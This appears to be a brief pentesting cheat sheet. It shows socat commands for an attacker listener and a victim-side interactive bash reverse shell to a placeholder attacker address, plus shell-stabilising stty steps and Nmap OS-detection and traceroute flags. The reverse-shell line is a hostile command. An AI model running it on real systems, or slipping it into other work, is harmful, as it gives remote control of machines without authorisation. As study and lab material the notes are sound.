
Socat Cheatsheet - Better netcat

Tool used to establish a more stabilize shell compare to netcat. Features: Used of the arrow key Allows for interactive commands such as sudo Use of CTRL + S, CTRL + C Reverse Shell for Linux Attacker: socat TCP-L:<port> FILE:tty,raw,echo=0 Victim: socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane Additional step: Open a new command prompt, and type stty-a, record the value of rows and columns Next, in your reverse/bind shell, type: stty rows <number>

OS Detection/Traceroute

Note: If you need a better view of the image, you can right click on the image -> Open image in a new tab. OS Detection To initiate a OS Detection with Nmap, you can use the -O For example: sudo nmap -O Traceroute If you want Nmap to find the routers between you and the target, you would add –traceroute For example: sudo nmap -sS --traceroute